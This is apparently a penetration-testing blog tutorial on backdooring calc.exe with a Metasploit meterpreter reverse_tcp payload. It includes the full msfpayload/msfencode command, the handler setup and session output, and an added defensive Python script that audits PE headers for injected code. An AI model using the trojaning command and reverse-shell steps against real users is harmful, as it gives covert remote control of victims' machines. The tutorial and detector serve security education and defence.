Using Metasploit to Backdoor Your Executable


Meta what?
The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, the shellcode archive, and security research.

A few days ago, an update was made to the Metasploit Framework that allows you to msfencode an msfpayload into an existing executable and still have the program function. To refresh your memory, msfencode is the tool that encodes a payload and packages it (for example, into an executable), and msfpayload generates the Metasploit payload itself.

A Metasploit payload (msfpayload) can be anything from a reverse shell to simply opening a port on the victim's machine. For example, you can inject an msfpayload into the Windows calculator (calc.exe) and still have the calculator operate as usual without the user's knowledge. So as the user launches the modified calculator program, a VNC server is stealthily executed in the background, allowing the attacker remote control of the victim's machine completely unbeknownst to the victim.

New MSFENCODE Options:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

We as security professionals need to stay current with new and emerging attack techniques. New developments in the Metasploit Framework make our jobs easier. As penetration testers, these innovations help us think outside the box and therefore aid in better securing the organizations who hire us.


---
Using msfencode to inject an msfpayload into calc.exe and writing the result to naughty_calc.exe:

~/rt$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.69
LHOST => 192.168.1.69
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.69:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.69:51695)
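From the defender's side, the interesting question is how a binary produced this way differs from the original. The following is an added example, not code from the original post or from the Metasploit project: a small PE section-table audit in Python that flags two traits a template-injected executable commonly shows, a section that is both writable and executable, and an entry point that no longer sits in the file's first code section. Both heuristics are assumptions about typical injected binaries (the exact layout msfencode produces varies by version), and build_sample_pe constructs a minimal test header, not a real calc.exe.

```python
import struct

# Section characteristic flags from the PE/COFF specification
SCN_CODE, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000

def parse_sections(data):
    """Return (AddressOfEntryPoint, [(name, rva, vsize, flags), ...]) from PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]    # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]  # same offset in PE32 and PE32+
    sec_off = pe_off + 24 + opt_size                             # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsec):
        name, vsize, rva, _, _, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, sec_off + 40 * i)
        sections.append((name.rstrip(b"\0").decode("latin-1"), rva, vsize, flags))
    return entry, sections

def audit_pe(data):
    """Return findings typical of a payload grafted onto an existing executable (heuristic)."""
    entry, sections = parse_sections(data)
    findings = []
    for name, rva, vsize, flags in sections:
        if flags & SCN_WRITE and flags & SCN_EXEC:
            findings.append(f"section {name!r} is writable and executable")
    holder = [s for s in sections if s[1] <= entry < s[1] + s[2]]   # section containing the entry point
    code = [s for s in sections if s[3] & (SCN_CODE | SCN_EXEC)]    # code sections in file order
    if not holder:
        findings.append("entry point 0x%x lies outside every section" % entry)
    elif code and holder[0] is not code[0]:
        findings.append(f"entry point is in {holder[0][0]!r}, not the first code section {code[0][0]!r}")
    return findings

def build_sample_pe(entry, sections):
    """Constructed minimal PE32 header for testing; not a real executable."""
    opt = bytearray(224)
    opt[0:2] = b"\x0b\x01"                      # PE32 magic
    struct.pack_into("<I", opt, 16, entry)      # AddressOfEntryPoint
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 64) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102) + bytes(opt)
    for name, rva, vsize, flags in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, rva, vsize, 0, 0, 0, 0, 0, flags)
    return hdr
```

Run audit_pe over the bytes of a suspect file; an empty list means neither heuristic fired, which is not proof the file is clean, so compare its hash against the vendor's original as well.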

DISCLAIMER
    The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.


Contact Us

Phone number: 1-612-234-7848
E-mail: info@redteamsecure.com